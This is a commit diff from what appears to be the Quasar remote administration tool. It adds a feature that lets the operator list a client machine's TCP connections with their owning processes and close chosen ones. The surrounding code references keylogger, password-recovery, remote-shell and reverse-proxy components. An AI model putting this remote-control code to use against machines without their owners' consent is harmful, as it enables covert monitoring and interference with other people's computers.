quasar
/
Quasar
mirror of https://github.com/quasar/Quasar.git
1
0
Fork 0
Code Issues Projects Releases Wiki Activity

Merge branch 'DragonzMaster-TCP-Connections'

This commit is contained in:
MaxXor 2016-03-30 15:32:31 +02:00
parent 432a26a998 ad410734d9
commit 8c5819406d
20 changed files with 866 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
Client/Client.csproj
View File

@ -54,6 +54,7 @@
</ItemGroup>
<ItemGroup>
<Compile Include="Core\Commands\RegistryHandler.cs" />
<Compile Include="Core\Commands\TCPConnectionsHandler.cs" />
<Compile Include="Core\Data\ClientData.cs" />
<Compile Include="Core\Data\GeoInformation.cs" />
<Compile Include="Core\Helper\MutexHelper.cs" />
@ -95,6 +96,7 @@
<Compile Include="Core\Extensions\RegistryKeyExtensions.cs" />
<Compile Include="Core\Networking\QuasarClient.cs" />
<Compile Include="Core\Packets\ClientPackets\GetChangeRegistryValueResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\GetConnectionsResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\GetCreateRegistryKeyResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\GetCreateRegistryValueResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\GetDeleteRegistryKeyResponse.cs" />
@ -106,6 +108,7 @@
<Compile Include="Core\Packets\ClientPackets\SetStatusFileManager.cs" />
<Compile Include="Core\Packets\ServerPackets\DoAskElevate.cs" />
<Compile Include="Core\Packets\ServerPackets\DoChangeRegistryValue.cs" />
<Compile Include="Core\Packets\ServerPackets\DoCloseConnection.cs" />
<Compile Include="Core\Packets\ServerPackets\DoCreateRegistryKey.cs" />
<Compile Include="Core\Packets\ServerPackets\DoCreateRegistryValue.cs" />
<Compile Include="Core\Packets\ServerPackets\DoDeleteRegistryKey.cs" />
@ -114,6 +117,7 @@
<Compile Include="Core\Packets\ServerPackets\DoLoadRegistryKey.cs" />
<Compile Include="Core\Packets\ServerPackets\DoRenameRegistryKey.cs" />
<Compile Include="Core\Packets\ServerPackets\DoRenameRegistryValue.cs" />
<Compile Include="Core\Packets\ServerPackets\GetConnections.cs" />
<Compile Include="Core\Packets\ServerPackets\GetPasswords.cs" />
<Compile Include="Core\Packets\ServerPackets\SetAuthenticationSuccess.cs" />
<Compile Include="Core\Recovery\FtpClients\FileZilla.cs" />

173
Client/Core/Commands/TCPConnectionsHandler.cs Normal file
View File

@ -0,0 +1,173 @@
using System;
using System.Diagnostics;
using System.Net;
using System.Runtime.InteropServices;
using xClient.Core.Networking;
using xClient.Core.Packets.ServerPackets;
namespace xClient.Core.Commands
{
/* THIS PARTIAL CLASS SHOULD CONTAIN METHODS THAT HANDLE TCP Connections COMMANDS. */
public static partial class CommandHandler
{
public static void HandleGetConnections(Client client, GetConnections packet)
{
MIB_TCPROW_OWNER_PID[] table = GetTable();
string[] Processes = new string[table.Length];
string[] LocalAddresses = new string[table.Length];
string[] LocalPorts = new string[table.Length];
string[] RemoteAddresses = new string[table.Length];
string[] RemotePorts = new string[table.Length];
byte[] States = new byte[table.Length];
/*int i = 0;
foreach (string proc in Processes)*/
for (int i = 0; i < table.Length; i++)
{
LocalAddresses[i] = string.Format("{0}", table[i].LocalAddress);
LocalPorts[i] = string.Format("{0}", table[i].LocalPort);
RemoteAddresses[i] = string.Format("{0}", table[i].RemoteAddress);
RemotePorts[i] = string.Format("{0}", table[i].RemotePort);
States[i] = Convert.ToByte(table[i].state);
try
{
Process p = Process.GetProcessById((int)table[i].owningPid);
Processes[i] = p.ProcessName;
}
catch
{
Processes[i] = string.Format("PID: {0}", table[i].owningPid);
}
}
new Packets.ClientPackets.GetConnectionsResponse(Processes, LocalAddresses, LocalPorts, RemoteAddresses, RemotePorts, States).Execute(client);
}
public static void HandleDoCloseConnection(Client client, DoCloseConnection packet)
{
MIB_TCPROW_OWNER_PID[] table = GetTable();
bool matchFound = false; // handle if connections's ports found
for (int i = 0; i < table.Length; i++)
{
//search for connection by Local and Remote Ports
if ((packet.LocalPort.ToString() == table[i].LocalPort.ToString()) &&
(packet.RemotePort.ToString() == table[i].RemotePort.ToString()))
// it will close the connection only if client run as admin
{
matchFound = true;
//table[i].state = (byte)ConnectionStates.Delete_TCB;
table[i].state = 12; // 12 for Delete_TCB state
IntPtr ptr = Marshal.AllocCoTaskMem(Marshal.SizeOf(table[i]));
Marshal.StructureToPtr(table[i], ptr, false);
int ret = SetTcpEntry(ptr);
}
}
if (matchFound) { HandleGetConnections(client, new GetConnections()); }
}
public static MIB_TCPROW_OWNER_PID[] GetTable()
{
MIB_TCPROW_OWNER_PID[] tTable;
int AF_INET = 2;
int buffSize = 0;
uint ret = GetExtendedTcpTable(IntPtr.Zero, ref buffSize, true, AF_INET, TCP_TABLE_CLASS.TCP_TABLE_OWNER_PID_ALL);
IntPtr buffTable = Marshal.AllocHGlobal(buffSize);
try
{
ret = GetExtendedTcpTable(buffTable, ref buffSize, true, AF_INET, TCP_TABLE_CLASS.TCP_TABLE_OWNER_PID_ALL);
if (ret != 0)
return null;
MIB_TCPTABLE_OWNER_PID tab = (MIB_TCPTABLE_OWNER_PID)Marshal.PtrToStructure(buffTable, typeof(MIB_TCPTABLE_OWNER_PID));
IntPtr rowPtr = (IntPtr)((long)buffTable + Marshal.SizeOf(tab.dwNumEntries));
tTable = new MIB_TCPROW_OWNER_PID[tab.dwNumEntries];
for (int i = 0; i < tab.dwNumEntries; i++)
{
MIB_TCPROW_OWNER_PID tcpRow = (MIB_TCPROW_OWNER_PID)Marshal.PtrToStructure(rowPtr, typeof(MIB_TCPROW_OWNER_PID));
tTable[i] = tcpRow;
rowPtr = (IntPtr)((long)rowPtr + Marshal.SizeOf(tcpRow));
}
}
finally
{
Marshal.FreeHGlobal(buffTable);
}
return tTable;
}
[StructLayout(LayoutKind.Sequential)]
public struct MIB_TCPROW_OWNER_PID
{
public UInt32 state;
public UInt32 localAddr;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public byte[] localPort;
public UInt32 remoteAddr;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public byte[] remotePort;
public UInt32 owningPid;
public System.Net.IPAddress LocalAddress
{
get
{
return new System.Net.IPAddress(localAddr);
}
}
public ushort LocalPort
{
get
{
return BitConverter.ToUInt16(new byte[2] { localPort[1], localPort[0] }, 0);
}
}
public System.Net.IPAddress RemoteAddress
{
get
{
return new IPAddress(remoteAddr);
}
}
public ushort RemotePort
{
get
{
return BitConverter.ToUInt16(new byte[2] { remotePort[1], remotePort[0] }, 0);
}
}
}
[StructLayout(LayoutKind.Sequential)]
public struct MIB_TCPTABLE_OWNER_PID
{
public uint dwNumEntries;
MIB_TCPROW_OWNER_PID table;
}
enum TCP_TABLE_CLASS
{
TCP_TABLE_BASIC_LISTENER,
TCP_TABLE_BASIC_CONNECTIONS,
TCP_TABLE_BASIC_ALL,
TCP_TABLE_OWNER_PID_LISTENER,
TCP_TABLE_OWNER_PID_CONNECTIONS,
TCP_TABLE_OWNER_PID_ALL,
TCP_TABLE_OWNER_MODULE_LISTENER,
TCP_TABLE_OWNER_MODULE_CONNECTIONS,
TCP_TABLE_OWNER_MODULE_ALL
}
[DllImport("iphlpapi.dll", SetLastError = true)]
static extern uint GetExtendedTcpTable(IntPtr pTcpTable, ref int dwOutBufLen, bool sort, int ipVersion, TCP_TABLE_CLASS tblClass, UInt32 reserved = 0);
[DllImport("iphlpapi.dll")]
private static extern int SetTcpEntry(IntPtr pTcprow);
}
}

6
Client/Core/Networking/QuasarClient.cs
View File

@ -67,6 +67,8 @@ namespace xClient.Core.Networking
typeof (Packets.ServerPackets.DoRenameRegistryValue),
typeof (Packets.ServerPackets.DoChangeRegistryValue),
typeof (Packets.ServerPackets.SetAuthenticationSuccess),
typeof (Packets.ServerPackets.GetConnections),
typeof (Packets.ServerPackets.DoCloseConnection),
typeof (Packets.ClientPackets.GetAuthenticationResponse),
typeof (Packets.ClientPackets.SetStatus),
typeof (Packets.ClientPackets.SetStatusFileManager),
@ -93,7 +95,9 @@ namespace xClient.Core.Networking
typeof (ReverseProxy.Packets.ReverseProxyConnect),
typeof (ReverseProxy.Packets.ReverseProxyConnectResponse),
typeof (ReverseProxy.Packets.ReverseProxyData),
typeof (ReverseProxy.Packets.ReverseProxyDisconnect)
typeof (ReverseProxy.Packets.ReverseProxyDisconnect),
typeof (Packets.ClientPackets.GetConnectionsResponse)
});
base.ClientState += OnClientState;
base.ClientRead += OnClientRead;

43
Client/Core/Packets/ClientPackets/GetConnectionsResponse.cs Normal file
View File

@ -0,0 +1,43 @@
using System;
using xClient.Core.Networking;
namespace xClient.Core.Packets.ClientPackets
{
[Serializable]
public class GetConnectionsResponse : IPacket
{
public string[] Processes { get; set; }
public string[] LocalAddresses { get; set; }
public string[] LocalPorts { get; set; }
public string[] RemoteAdresses { get; set; }
public string[] RemotePorts { get; set; }
public byte[] States { get; set; }
public GetConnectionsResponse()
{
}
public GetConnectionsResponse(string[] processes, string[] localaddresses, string[] localports,
string[] remoteadresses, string[] remoteports, byte[] states)
{
this.Processes = processes;
this.LocalAddresses = localaddresses;
this.LocalPorts = localports;
this.RemoteAdresses = remoteadresses;
this.RemotePorts = remoteports;
this.States = states;
}
public void Execute(Client client)
{
client.Send(this);
}
}
}

8
Client/Core/Packets/PacketHandler.cs
View File

@ -175,6 +175,14 @@ namespace xClient.Core.Packets
{
ReverseProxyCommandHandler.HandleCommand(client, packet);
}
else if (type == typeof(ServerPackets.GetConnections))
{
CommandHandler.HandleGetConnections(client, (ServerPackets.GetConnections)packet);
}
else if (type == typeof(ServerPackets.DoCloseConnection))
{
CommandHandler.HandleDoCloseConnection(client, (ServerPackets.DoCloseConnection)packet);
}
}
}
}

28
Client/Core/Packets/ServerPackets/DoCloseConnection.cs Normal file
View File

@ -0,0 +1,28 @@
using System;
using xClient.Core.Networking;
namespace xClient.Core.Packets.ServerPackets
{
[Serializable]
public class DoCloseConnection : IPacket
{
public int LocalPort { get; set; }
public int RemotePort { get; set; }
public DoCloseConnection()
{
}
public DoCloseConnection(int localport, int remoteport)
{
this.LocalPort = localport;
this.RemotePort = remoteport;
}
public void Execute(Client client)
{
client.Send(this);
}
}
}

19
Client/Core/Packets/ServerPackets/GetConnections.cs Normal file
View File

@ -0,0 +1,19 @@
using System;
using xClient.Core.Networking;
namespace xClient.Core.Packets.ServerPackets
{
[Serializable]
public class GetConnections : IPacket
{
public GetConnections()
{
}
public void Execute(Client client)
{
client.Send(this);
}
}
}

64
Server/Core/Commands/TCPConnectionsHandler.cs Normal file
View File

@ -0,0 +1,64 @@
using System.Threading;
using xServer.Core.Networking;
using xServer.Core.Packets.ClientPackets;
namespace xServer.Core.Commands
{
/* THIS PARTIAL CLASS SHOULD CONTAIN METHODS THAT HANDLE TCP Connections COMMANDS. */
public static partial class CommandHandler
{
public static void HandleGetConnectionsResponse(Client client, GetConnectionsResponse packet)
{
if (client.Value == null || client.Value.FrmCon == null)
return;
client.Value.FrmCon.ClearListviewItems();
// None of the arrays containing the process' information can be null.
// The must also be the exact same length because each entry in the five
// different arrays represents one process.
if (packet.Processes == null || packet.LocalAddresses == null || packet.LocalPorts == null ||
packet.RemoteAddresses == null || packet.RemotePorts == null || packet.States == null ||
packet.Processes.Length != packet.LocalAddresses.Length || packet.Processes.Length != packet.LocalPorts.Length ||
packet.Processes.Length != packet.RemoteAddresses.Length || packet.Processes.Length != packet.RemotePorts.Length ||
packet.Processes.Length != packet.States.Length)
return;
new Thread(() =>
{
/*if (client.Value != null && client.Value.FrmTm != null)
client.Value.FrmTm.SetProcessesCount(packet.Process.Length);*/
for (int i = 0; i < packet.Processes.Length; i++)
{
/*if (packet.IDs[i] == 0 || packet.Processes[i] == "System.exe")
continue;*/
if (client.Value == null || client.Value.FrmCon == null)
break;
client.Value.FrmCon.AddConnectionToListview(packet.Processes[i], packet.LocalAddresses[i], packet.LocalPorts[i],
packet.RemoteAddresses[i], packet.RemotePorts[i], ((ConnectionStates)packet.States[i]).ToString());
}
}).Start();
}
enum ConnectionStates : byte
{
Closed = 1,
Listening = 2,
SYN_Sent = 3,
Syn_Recieved = 4,
Established = 5,
Finish_Wait_1 = 6,
Finish_Wait_2 = 7,
Closed_Wait = 8,
Closing = 9,
Last_ACK = 10,
Time_Wait = 11,
Delete_TCB = 12
}
}
}

6
Server/Core/Networking/QuasarServer.cs
View File

@ -114,6 +114,8 @@ namespace xServer.Core.Networking
typeof (Packets.ServerPackets.DoRenameRegistryValue),
typeof (Packets.ServerPackets.DoChangeRegistryValue),
typeof (Packets.ServerPackets.SetAuthenticationSuccess),
typeof (Packets.ServerPackets.GetConnections),
typeof (Packets.ServerPackets.DoCloseConnection),
typeof (Packets.ClientPackets.GetAuthenticationResponse),
typeof (Packets.ClientPackets.SetStatus),
typeof (Packets.ClientPackets.SetStatusFileManager),
@ -140,7 +142,9 @@ namespace xServer.Core.Networking
typeof (ReverseProxy.Packets.ReverseProxyConnect),
typeof (ReverseProxy.Packets.ReverseProxyConnectResponse),
typeof (ReverseProxy.Packets.ReverseProxyData),
typeof (ReverseProxy.Packets.ReverseProxyDisconnect)
typeof (ReverseProxy.Packets.ReverseProxyDisconnect),
typeof (Packets.ClientPackets.GetConnectionsResponse)
});
base.ClientState += OnClientState;

4
Server/Core/Networking/UserState.cs
View File

@ -34,6 +34,8 @@ namespace xServer.Core.Networking
public FrmKeylogger FrmKl { get; set; }
public FrmReverseProxy FrmProxy { get; set; }
public FrmPasswordRecovery FrmPass { get; set; }
public FrmConnections FrmCon { get; set; }
public bool ReceivedLastDirectory { get; set; }
public UnsafeStreamCodec StreamCodec { get; set; }
@ -97,6 +99,8 @@ namespace xServer.Core.Networking
FrmProxy.Invoke((MethodInvoker)delegate { FrmProxy.Close(); });
if (FrmPass != null)
FrmPass.Invoke((MethodInvoker)delegate { FrmPass.Close(); });
if (FrmCon != null)
FrmCon.Invoke((MethodInvoker)delegate { FrmCon.Close(); });
}
catch (InvalidOperationException)
{

42
Server/Core/Packets/ClientPackets/GetConnectionsResponse.cs Normal file
View File

@ -0,0 +1,42 @@
using System;
using xServer.Core.Networking;
namespace xServer.Core.Packets.ClientPackets
{
[Serializable]
public class GetConnectionsResponse : IPacket
{
public string[] Processes { get; set; }
public string[] LocalAddresses { get; set; }
public string[] LocalPorts { get; set; }
public string[] RemoteAddresses { get; set; }
public string[] RemotePorts { get; set; }
public byte[] States { get; set; }
public GetConnectionsResponse()
{
}
public GetConnectionsResponse(string[] processes, string[] localaddresses, string[] localports,
string[] remoteadresses, string[] remoteports, byte[] states)
{
this.Processes = processes;
this.LocalAddresses = localaddresses;
this.LocalPorts = localports;
this.RemoteAddresses = remoteadresses;
this.RemotePorts = remoteports;
this.States = states;
}
public void Execute(Client client)
{
client.Send(this);
}
}
}

4
Server/Core/Packets/PacketHandler.cs
View File

@ -112,6 +112,10 @@ namespace xServer.Core.Packets
{
ReverseProxyCommandHandler.HandleCommand(client, packet);
}
else if (type == typeof(ClientPackets.GetConnectionsResponse))
{
CommandHandler.HandleGetConnectionsResponse(client, (ClientPackets.GetConnectionsResponse)packet);
}
}
}
}

28
Server/Core/Packets/ServerPackets/DoCloseConnection.cs Normal file
View File

@ -0,0 +1,28 @@
using System;
using xServer.Core.Networking;
namespace xServer.Core.Packets.ServerPackets
{
[Serializable]
public class DoCloseConnection : IPacket
{
public int LocalPort { get; set; }
public int RemotePort { get; set; }
public DoCloseConnection()
{
}
public DoCloseConnection(int localport, int remoteport)
{
this.LocalPort = localport;
this.RemotePort = remoteport;
}
public void Execute(Client client)
{
client.Send(this);
}
}
}

19
Server/Core/Packets/ServerPackets/GetConnections.cs Normal file
View File

@ -0,0 +1,19 @@
using System;
using xServer.Core.Networking;
namespace xServer.Core.Packets.ServerPackets
{
[Serializable]
public class GetConnections : IPacket
{
public GetConnections()
{
}
public void Execute(Client client)
{
client.Send(this);
}
}
}

147
Server/Forms/FrmConnections.Designer.cs generated Normal file
View File

@ -0,0 +1,147 @@
namespace xServer.Forms
{
partial class FrmConnections
{
/// <summary>
/// Required designer variable.
/// </summary>
private System.ComponentModel.IContainer components = null;
/// <summary>
/// Clean up any resources being used.
/// </summary>
/// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
protected override void Dispose(bool disposing)
{
if (disposing && (components != null))
{
components.Dispose();
}
base.Dispose(disposing);
}
#region Windows Form Designer generated code
/// <summary>
/// Required method for Designer support - do not modify
/// the contents of this method with the code editor.
/// </summary>
private void InitializeComponent()
{
this.components = new System.ComponentModel.Container();
this.contextMenuStrip = new System.Windows.Forms.ContextMenuStrip(this.components);
this.refreshToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.closeConnectionToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.lstConnections = new xServer.Controls.AeroListView();
this.columnHeader1 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.columnHeader2 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.columnHeader3 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.columnHeader4 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.columnHeader5 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.columnHeader6 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.contextMenuStrip.SuspendLayout();
this.SuspendLayout();
//
// contextMenuStrip
//
this.contextMenuStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.refreshToolStripMenuItem,
this.closeConnectionToolStripMenuItem});
this.contextMenuStrip.Name = "contextMenuStrip";
this.contextMenuStrip.Size = new System.Drawing.Size(169, 48);
//
// refreshToolStripMenuItem
//
this.refreshToolStripMenuItem.Image = global::xServer.Properties.Resources.refresh;
this.refreshToolStripMenuItem.Name = "refreshToolStripMenuItem";
this.refreshToolStripMenuItem.Size = new System.Drawing.Size(168, 22);
this.refreshToolStripMenuItem.Text = "Refresh";
this.refreshToolStripMenuItem.Click += new System.EventHandler(this.refreshToolStripMenuItem_Click);
//
// closeConnectionToolStripMenuItem
//
this.closeConnectionToolStripMenuItem.Image = global::xServer.Properties.Resources.uac_shield;
this.closeConnectionToolStripMenuItem.Name = "closeConnectionToolStripMenuItem";
this.closeConnectionToolStripMenuItem.Size = new System.Drawing.Size(168, 22);
this.closeConnectionToolStripMenuItem.Text = "Close Connection";
this.closeConnectionToolStripMenuItem.Click += new System.EventHandler(this.closeConnectionToolStripMenuItem_Click);
//
// lstConnections
//
this.lstConnections.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
this.columnHeader1,
this.columnHeader2,
this.columnHeader3,
this.columnHeader4,
this.columnHeader5,
this.columnHeader6});
this.lstConnections.ContextMenuStrip = this.contextMenuStrip;
this.lstConnections.Dock = System.Windows.Forms.DockStyle.Fill;
this.lstConnections.FullRowSelect = true;
this.lstConnections.Location = new System.Drawing.Point(0, 0);
this.lstConnections.Name = "lstConnections";
this.lstConnections.Size = new System.Drawing.Size(555, 411);
this.lstConnections.TabIndex = 0;
this.lstConnections.UseCompatibleStateImageBehavior = false;
this.lstConnections.View = System.Windows.Forms.View.Details;
//
// columnHeader1
//
this.columnHeader1.Text = "Process";
this.columnHeader1.Width = 100;
//
// columnHeader2
//
this.columnHeader2.Text = "Local Address";
this.columnHeader2.Width = 95;
//
// columnHeader3
//
this.columnHeader3.Text = "Local Port";
this.columnHeader3.Width = 75;
//
// columnHeader4
//
this.columnHeader4.Text = "Remote Address";
this.columnHeader4.Width = 95;
//
// columnHeader5
//
this.columnHeader5.Text = "Remote Port";
this.columnHeader5.Width = 75;
//
// columnHeader6
//
this.columnHeader6.Text = "State";
this.columnHeader6.Width = 85;
//
// FrmConnections
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.ClientSize = new System.Drawing.Size(555, 411);
this.Controls.Add(this.lstConnections);
this.Name = "FrmConnections";
this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
this.Text = "Connections";
this.FormClosing += new System.Windows.Forms.FormClosingEventHandler(this.FrmConnections_FormClosing);
this.Load += new System.EventHandler(this.FrmConnections_Load);
this.contextMenuStrip.ResumeLayout(false);
this.ResumeLayout(false);
}
#endregion
private Controls.AeroListView lstConnections;
private System.Windows.Forms.ColumnHeader columnHeader1;
private System.Windows.Forms.ColumnHeader columnHeader2;
private System.Windows.Forms.ColumnHeader columnHeader3;
private System.Windows.Forms.ColumnHeader columnHeader4;
private System.Windows.Forms.ColumnHeader columnHeader5;
private System.Windows.Forms.ColumnHeader columnHeader6;
private System.Windows.Forms.ContextMenuStrip contextMenuStrip;
private System.Windows.Forms.ToolStripMenuItem refreshToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem closeConnectionToolStripMenuItem;
}
}

115
Server/Forms/FrmConnections.cs Normal file
View File

@ -0,0 +1,115 @@
using System;
using System.Collections.Generic;
using System.Windows.Forms;
using xServer.Core.Helper;
using xServer.Core.Networking;
namespace xServer.Forms
{
public partial class FrmConnections : Form
{
private readonly Client _connectClient;
Dictionary<string, ListViewGroup> Groups = new Dictionary<string, ListViewGroup>();
public FrmConnections(Client c)
{
_connectClient = c;
_connectClient.Value.FrmCon = this;
InitializeComponent();
}
private void FrmConnections_Load(object sender, EventArgs e)
{
if (_connectClient != null)
{
this.Text = WindowHelper.GetWindowTitle("Connections", _connectClient);
new Core.Packets.ServerPackets.GetConnections().Execute(_connectClient);
}
}
public void AddConnectionToListview(string processName, string localaddress, string localport, string remoteaddress, string remoteport, string state)
{
try
{
ListViewItem lvi = new ListViewItem(new string[]
{
processName, localaddress, localport, remoteaddress , remoteport, state
});
lstConnections.Invoke((MethodInvoker)delegate
{
if (!Groups.ContainsKey(state))
{
ListViewGroup g = new ListViewGroup(state, state);
lstConnections.Groups.Add(g);
Groups.Add(state, g);
}
lvi.Group = lstConnections.Groups[state];
lstConnections.Items.Add(lvi);
});
}
catch (InvalidOperationException)
{
}
}
public void ClearListviewItems()
{
try
{
lstConnections.Invoke((MethodInvoker)delegate
{
lstConnections.Items.Clear();
});
}
catch (InvalidOperationException)
{
}
}
enum ConnectionStates : byte
{
Closed = 1,
Listening = 2,
SYN_Sent = 3,
Syn_Recieved = 4,
Established = 5,
Finish_Wait_1 = 6,
Finish_Wait_2 = 7,
Closed_Wait = 8,
Closing = 9,
Last_ACK = 10,
Time_Wait = 11,
Delete_TCB = 12
}
private void FrmConnections_FormClosing(object sender, FormClosingEventArgs e)
{
if (_connectClient.Value != null)
_connectClient.Value.FrmCon = null;
}
private void refreshToolStripMenuItem_Click(object sender, EventArgs e)
{
if (_connectClient != null)
{
new Core.Packets.ServerPackets.GetConnections().Execute(_connectClient);
}
}
private void closeConnectionToolStripMenuItem_Click(object sender, EventArgs e)
{
if (_connectClient != null)
{
foreach (ListViewItem lvi in lstConnections.SelectedItems)
{
//send local and remote ports of connection
new Core.Packets.ServerPackets.DoCloseConnection(int.Parse(lvi.SubItems[2].Text),
int.Parse(lvi.SubItems[4].Text)).Execute(_connectClient);
}
}
}
}
}

123
Server/Forms/FrmConnections.resx Normal file
View File

@ -0,0 +1,123 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<metadata name="contextMenuStrip.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>17, 17</value>
</metadata>
</root>

13
Server/Forms/FrmMain.Designer.cs generated
View File

@ -44,6 +44,7 @@ namespace xServer.Forms
this.startupManagerToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.taskManagerToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.remoteShellToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.connectionsToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.reverseProxyToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.registryEditorToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.elevateClientPermissionsToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
@ -101,8 +102,7 @@ namespace xServer.Forms
this.lineToolStripMenuItem,
this.selectAllToolStripMenuItem});
this.contextMenuStrip.Name = "ctxtMenu";
this.contextMenuStrip.Size = new System.Drawing.Size(150, 120);
this.contextMenuStrip.Opening += new System.ComponentModel.CancelEventHandler(this.contextMenuStrip_Opening);
this.contextMenuStrip.Size = new System.Drawing.Size(153, 142);
//
// connectionToolStripMenuItem
//
@ -156,6 +156,7 @@ namespace xServer.Forms
this.startupManagerToolStripMenuItem,
this.taskManagerToolStripMenuItem,
this.remoteShellToolStripMenuItem,
this.connectionsToolStripMenuItem,
this.reverseProxyToolStripMenuItem,
this.registryEditorToolStripMenuItem,
this.elevateClientPermissionsToolStripMenuItem,
@ -206,6 +207,13 @@ namespace xServer.Forms
this.remoteShellToolStripMenuItem.Text = "Remote Shell";
this.remoteShellToolStripMenuItem.Click += new System.EventHandler(this.remoteShellToolStripMenuItem_Click);
//
// connectionsToolStripMenuItem
//
this.connectionsToolStripMenuItem.Name = "connectionsToolStripMenuItem";
this.connectionsToolStripMenuItem.Size = new System.Drawing.Size(178, 22);
this.connectionsToolStripMenuItem.Text = "TCP Connections";
this.connectionsToolStripMenuItem.Click += new System.EventHandler(this.connectionsToolStripMenuItem_Click);
//
// reverseProxyToolStripMenuItem
//
this.reverseProxyToolStripMenuItem.Image = global::xServer.Properties.Resources.server_link;
